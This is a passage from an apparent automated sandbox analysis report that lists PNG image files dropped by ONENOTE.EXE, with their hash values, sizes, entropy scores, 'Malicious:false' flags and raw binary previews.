                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
